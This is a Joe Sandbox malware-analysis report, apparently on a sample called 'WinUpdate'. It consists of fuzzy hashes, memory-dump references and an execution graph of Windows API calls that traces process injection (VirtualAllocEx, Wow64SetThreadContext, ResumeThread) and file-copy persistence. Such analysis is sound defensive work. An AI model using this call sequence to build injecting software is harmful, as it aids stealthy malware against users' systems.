                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                                                                                                                • Opcode ID: aab60ec39bc35d217e4b9d89648dfadaacb5d6d268a21b780909f2a6b3ea128b
                                                                                                                                                                                                                                                                                                • Instruction ID: e169bfa82fb5844d1cf29a6e8da38a62cfe8739c1940d51d204b9c128b86407a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aab60ec39bc35d217e4b9d89648dfadaacb5d6d268a21b780909f2a6b3ea128b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D22139719043098FDB10DFAAC485BAEBBF4FF48314F14842ED559A7241DB78A944CFA5

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 337 afd658-afd6f4 DuplicateHandle 338 afd6fd-afd71a 337->338 339 afd6f6-afd6fc 337->339 339->338
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AFD6E7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2154829158.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_af0000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 973c99d40ac749402a007b1d68fe975e130ffb0caa1cdff81493ac0d10a09253
                                                                                                                                                                                                                                                                                                • Instruction ID: 31e15acf629242ffbe4bb1a56b0dd5c8b5fdd8afd6c2ecbd6de9bec0e529255b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 973c99d40ac749402a007b1d68fe975e130ffb0caa1cdff81493ac0d10a09253
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E21E3B5900209DFDB10CF9AD984AEEBBF5FF48324F14841AE958A3210D378A954CF64
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0508BCD0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                                                                                                                                • Opcode ID: dd08c91e221116b6ae6c69c59a13e7e0432ec5439ae0f95d9354193662c07400
                                                                                                                                                                                                                                                                                                • Instruction ID: f52282bc2fedf0f394cf3af8f00fba9c2dbdf7c48e393580258cf08f64766c89
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd08c91e221116b6ae6c69c59a13e7e0432ec5439ae0f95d9354193662c07400
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB2128B1900349DFDB10DFAAC881BEEBBF5FF48310F108429E559A7250CB79A510CBA5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0508BA46
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 86e24da9b26cb41ff64077b876337faed4aeddd1f688a4d7c87f2088a119189c
                                                                                                                                                                                                                                                                                                • Instruction ID: c3503343ea3ef0a110e916760fa96db6e0f79648b1ba7de9f120b6ba0a668d3f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86e24da9b26cb41ff64077b876337faed4aeddd1f688a4d7c87f2088a119189c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 582118719043098FDB10DFAAC485BAEBBF4AF88324F148429D559A7241DB78A944CFA5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AFD6E7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2154829158.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_af0000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0c4c78a5860c720af58c60d3e12aefc7c7aeff28356ec3230e9834e3117e61b6
                                                                                                                                                                                                                                                                                                • Instruction ID: 94e69dec0d7abf7095406731e5c89e91cd586e1200b4156ca1291f249751b152
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c4c78a5860c720af58c60d3e12aefc7c7aeff28356ec3230e9834e3117e61b6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E921E3B5900209DFDB10CF9AD984AEEBBF5EB48320F14841AE918A3210D378A950CFA4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0508BB0E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 69e4cdd4a4eb244ae35839a96e172400f111208e213e9a23d15f38fc3b898b6d
                                                                                                                                                                                                                                                                                                • Instruction ID: f0539141906171cc82f4ef6c714a596d4a3f477ce730009149312a5c78cb313e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69e4cdd4a4eb244ae35839a96e172400f111208e213e9a23d15f38fc3b898b6d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D2138719003499FDB10DFAAC845BAEBBF5FF88320F148419E555A7250C7759550CB90
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2e13dc00f5311a751ca720c55dc84c8bf27f12dafcf7bd948803d5bcbbbc55a9
                                                                                                                                                                                                                                                                                                • Instruction ID: e34895340b2b5cf2cdcfc26663b4ad468a1e3798b952734d3179d47ac7ac3044
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e13dc00f5311a751ca720c55dc84c8bf27f12dafcf7bd948803d5bcbbbc55a9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D1137719003498FDB20DFAAC4457AEFBF4AF88720F208419D599A7250CB756544CBA4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0508BB0E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5f1f326975815f0c51bbdd245f14a2ca5f1b129b3b6da3d9d83fb38d0bbc2436
                                                                                                                                                                                                                                                                                                • Instruction ID: 82869b5aca1774f95386d5e5693da162f463fe2449431b7f1dde69020a8fdc85
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f1f326975815f0c51bbdd245f14a2ca5f1b129b3b6da3d9d83fb38d0bbc2436
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 561126729003499FDB10DFAAC845BEEBBF5EF88320F148419E559A7250CB75A550CBA1
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 8a938606069ad46351239a2826972fa1115d8675147eecdab5724a4ce50b7573
                                                                                                                                                                                                                                                                                                • Instruction ID: 742554568897d19e22afa3f496283b033bc7b1589faa828ac0bcadba6fbd7e93
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a938606069ad46351239a2826972fa1115d8675147eecdab5724a4ce50b7573
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D1166B1D00349CFDB20DFAAC445BAEFBF4AF88320F208419D559A7250CB79A900CBA4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0508E63D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 622390b4fbf6636d1a7e51da01b21bef813836c6f8e15dc2eb17d06bfb8360cc
                                                                                                                                                                                                                                                                                                • Instruction ID: 6a764b3217e1215f200e8aba7791cad45aa6feaa8abb1cddab0b1d0497646364
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 622390b4fbf6636d1a7e51da01b21bef813836c6f8e15dc2eb17d06bfb8360cc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 971125B5804309DFDB20DF8AD444BEEBBF8EB48320F108419E554A3200D375A954CFA4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00AFAFDE
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2154829158.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_af0000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b69f676baef42e1da6f4743854e5d528a4060746d7e793aa1efa97cfbbf880c7
                                                                                                                                                                                                                                                                                                • Instruction ID: bc41aacfcc3b4b7fef4c3f1268a154428deedc6040ccd1507ab48140e9905d65
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b69f676baef42e1da6f4743854e5d528a4060746d7e793aa1efa97cfbbf880c7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7711E0B6C007498FDB10CF9AC444BDEFBF4AF88324F10845AE969A7610D7B9A545CFA1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2151018861.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_85d000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 623d0baa89113d9c67e66241541bbb0adedb0ef769e4ff21c9e18e5175245c3f
                                                                                                                                                                                                                                                                                                • Instruction ID: 4e8f1cc1c03a74aab7dda9393b5e4e72c7b57c01e1e2737bb1de9dfb585335d9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 623d0baa89113d9c67e66241541bbb0adedb0ef769e4ff21c9e18e5175245c3f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE213672504304DFDB15DF00D9C0B2ABF61FB88315F20C1A9ED098B256C376E81ACBA1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2151018861.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_85d000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9159c6376476abdfe8783847047348ba0ee6cd8cfccc691e0ccaff289a234d17
                                                                                                                                                                                                                                                                                                • Instruction ID: 75a780f151692601084f5c72f23fa0f3afb34b3d38d95f4b15eee92e8c5543b2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9159c6376476abdfe8783847047348ba0ee6cd8cfccc691e0ccaff289a234d17
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F214572500344EFCB25DF14D9C0B26BF61FB88319F20C169ED098B256C336D85ACAA1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2151766388.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_86d000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7bac74838f98d0024eacabe1debbfdc29383a5df87e6126065fad4122b75c3d9
                                                                                                                                                                                                                                                                                                • Instruction ID: a0c45f1d04f2910718c68d24fa5463efcd601a9256169426c2dc0d41eeb7f3e7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bac74838f98d0024eacabe1debbfdc29383a5df87e6126065fad4122b75c3d9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D213771A04304EFDB05DF10D5D0B25BB61FB84318F24C56DD9098B352C376E846CB61
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2151766388.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_86d000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 2feff1151c12d9a4cb4d51a5b673866ac03122c6be753103f974b04241e24993
                                                                                                                                                                                                                                                                                                • Instruction ID: 9861e58af48c6e14adf1bc38d91592875058dfce6e22578bc0e26c4f3c293715
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2feff1151c12d9a4cb4d51a5b673866ac03122c6be753103f974b04241e24993
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA213775A04744DFCB14DF14D5C0B26BB65FB84318F20C56DD90A8B252C77BD807CA62
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2151018861.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_85d000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                                                                                                                                                                                                                                                                                                • Instruction ID: e69105acb044cdf64186bf5b6b05b23f1f97f9961b1c34d290514509641ec66f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5921CDB6404280CFDB16CF00D9C4B16BF62FB84314F24C1A9DC084B256C33AE82ACBA1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2151018861.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_85d000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                                                                                                                                                                                                • Instruction ID: 405a2de972c2e0e518ea6075ee01ee7ba1a09fbb40f6a26b4dba17bf5335636e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC11AF76504284CFCB15CF10D5C4B16BF72FB94318F24C6A9DC494B656C33AD85ACBA1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2151766388.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_86d000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                                                                                                                                                                                • Instruction ID: 48c7aee09cd1755d3713fe80afbacf534b748adc50aefe737cfaca3e9df28c50
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E118E75A04784DFCB15CF14D5C4B15BB62FB84314F24C6A9D8498B656C33AD84ACB62
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2151766388.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_86d000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                                                                                                                                                                                • Instruction ID: 69d96bdc2bba7f1327ddb115f7218782cb0ef068829f9e3ef9a0869b95b8e692
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40118E75A04384DFCB15CF10D5D4B15BB61FB84314F28C6A9D8498B756C33AE84ACB51
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2151018861.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_85d000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 06d6e14b436b9ada06c909c571c9921431972332793210eb93156086e30fd212
                                                                                                                                                                                                                                                                                                • Instruction ID: c29bc4612ab8b3ac40a498f050314486606c932b89591beab93918b167058adc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06d6e14b436b9ada06c909c571c9921431972332793210eb93156086e30fd212
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81012B71004344DAF7304B25CDC4B66FFD8FF45366F18C45AED098A296C7799848C6B1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2151018861.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_85d000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c0069d61398e0172033a705905e2f5195a9cd33aedb2d29f6c1690d8aa840e31
                                                                                                                                                                                                                                                                                                • Instruction ID: ff6bdb04c53ef904f28d386994df8bf4eb00225ac308fb718df190ed2846981d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0069d61398e0172033a705905e2f5195a9cd33aedb2d29f6c1690d8aa840e31
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCF0C2724043449EE7208A06DCC4B62FFE8EF54725F18C45AED084A286C379A844CAB1

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:6.8%
                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                                                                Total number of Nodes:995
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:64
                                                                                                                                                                                                                                                                                                execution_graph 21431 2e6c7a7 21432 2e6c7be 21431->21432 21436 2e6c81c 21431->21436 21432->21436 21442 2e6c7e6 GetModuleHandleA 21432->21442 21434 2e6c835 GetModuleHandleA 21437 2e6c83f 21434->21437 21435 2e6c872 21436->21434 21436->21435 21436->21437 21437->21436 21438 2e6c85f GetProcAddress 21437->21438 21438->21436 21439 2e6c7dd 21439->21436 21439->21437 21440 2e6c800 GetProcAddress 21439->21440 21440->21436 21441 2e6c80d VirtualProtect 21440->21441 21441->21436 21443 2e6c7ef 21442->21443 21451 2e6c81c 21442->21451 21453 2e6c803 GetProcAddress 21443->21453 21445 2e6c7f4 21448 2e6c800 GetProcAddress 21445->21448 21445->21451 21446 2e6c835 GetModuleHandleA 21450 2e6c83f 21446->21450 21447 2e6c872 21449 2e6c80d VirtualProtect 21448->21449 21448->21451 21449->21451 21450->21451 21452 2e6c85f GetProcAddress 21450->21452 21451->21446 21451->21447 21451->21450 21452->21451 21454 2e6c81c 21453->21454 21455 2e6c80d VirtualProtect 21453->21455 21456 2e6c835 GetModuleHandleA 21454->21456 21457 2e6c872 21454->21457 21455->21454 21459 2e6c83f 21456->21459 21458 2e6c85f GetProcAddress 21458->21459 21459->21454 21459->21458 21460 10001f42 21506 10004330 21460->21506 21462 10001f51 CreateDirectoryW 21521 10004d80 21462->21521 21465 10004d80 28 API calls 21466 10001f91 CopyFileW 21465->21466 21468 10001fc0 21466->21468 21469 10001fb6 21466->21469 21471 10001ff0 21468->21471 21472 10004160 28 API calls 21468->21472 21578 10004160 21469->21578 21527 10003a70 21471->21527 21472->21471 21474 10002023 21544 100067d0 21474->21544 21476 100024f0 21594 100038d0 28 API calls 21476->21594 21478 1000250b 21480 10002523 21478->21480 21482 10004160 28 API calls 21478->21482 21479 10004d80 28 API calls 21492 1000202b 21479->21492 21483 10002552 21480->21483 21484 10004160 28 API calls 21480->21484 21481 10002590 21596 1000a5c6 28 API calls 2 library calls 21481->21596 21482->21480 21485 10002578 21483->21485 21487 10004160 28 API calls 21483->21487 21484->21483 21487->21485 21488 1000259a 21489 100021d5 CreateDirectoryW CreateDirectoryW 21491 10004330 28 API calls 21489->21491 21490 10004160 28 API calls 21490->21489 21491->21492 21492->21476 21492->21479 21492->21481 21492->21489 21492->21490 21493 10004e80 28 API calls 21492->21493 21494 10004cc0 28 API calls 21492->21494 21495 100022bc CopyFileW 21492->21495 21496 10002365 CopyFileW 21492->21496 21497 10004160 28 API calls 21492->21497 21503 10004160 28 API calls 21492->21503 21493->21492 21494->21492 21495->21492 21496->21492 21498 10002392 21496->21498 21497->21496 21593 10006e60 41 API calls 21498->21593 21500 100023ae CreateFileW 21501 10002405 21500->21501 21502 100023ea WriteFile CloseHandle 21500->21502 21501->21492 21504 1000258b 21501->21504 21502->21501 21503->21492 21595 1000daab 26 API calls __cftof 21504->21595 21507 10004386 21506->21507 21513 1000433e 21506->21513 21508 10004398 21507->21508 21509 1000443f 21507->21509 21511 100043b0 21508->21511 21512 10004449 21508->21512 21518 100043be 21508->21518 21611 1000a5a6 28 API calls 2 library calls 21509->21611 21511->21518 21610 100046f0 28 API calls 2 library calls 21511->21610 21612 